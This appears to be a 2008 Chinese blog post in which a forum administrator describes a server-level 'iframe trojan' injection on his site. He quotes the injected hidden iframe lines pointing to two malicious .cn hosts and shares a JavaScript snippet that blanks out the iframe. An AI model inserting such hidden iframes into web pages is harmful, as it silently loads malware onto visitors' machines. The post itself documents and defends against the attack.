百度空间 | 百度首页 
 
查看文章
 
内框架挂马-病毒猖獗
2008年06月23日 星期一 上午 02:02

  上周发现偶自己管理的社区被内框架挂马,一打开卡巴斯基就提示“包含特洛伊程序”,安装360后提示“拦截到一个木马或恶意广告页面”,且看图:

查看HTML源码,发现代码顶部多一句iframe语句,汗!!!

<iframe src=http://nudsyhk2.cn/z51.htm?14 width=20 height=0 frameborder=0></iframe>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="zh-CN" lang="zh-CN" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>欢迎访问[爱大方论坛]</title>

后逐一查看网站源码,并没有该行代码,于是查服务器,果然,同一服务器上的其它网站也被加一句同样的内框架代码,确定是服务器问题。无法,为了保证暂时的正常访问,用JS清除之。由于病毒制告者很聪明,在其挂码站内使JS出错,直接用JS还不被执行,NND,唯有先屏蔽js错误,再取到第一个内框架元素,将其src属性改为about:blank;代码如下:

<script language="JavaScript" type="text/javascript">
//屏蔽js错误
function ResumeError() {
return true;
}
window.onerror = ResumeError;

if((document.getElementsByTagName("iframe")[0].src).indexOf("http://")!=-1)//判断不是站内iframe
{
document.getElementsByTagName("iframe")[0].src="about:blank";
//alert((document.getElementsByTagName("iframe")[0].src).indexOf("http://"));
}
</script>

但是没有想到的是,今天访问中国人才热线的网站,也出现如下提示,网络安全啊,

<iframe src=http://www.vvbbcss.cn/1.htm?13 width=100 height=0></iframe>                                 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>深圳人才深圳招聘深圳求职--中国人才热线</title>

真不知道还有多少这样的站点,晕!!!!


类别:计算机 | 添加到搜藏 | 浏览() | 评论 (2)
 
最近读者:
 
网友评论:
1
2008年06月25日 星期三 上午 11:59 | 回复
我也碰到了 真不知道这样的人 生的孩子有没有屁眼 如果老天不管 大家诅咒下吧 真不知道 这样的人 活着有什么意义
 
2
2008年08月12日 星期二 上午 00:52 | 回复
拜读此文,明白不少!
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu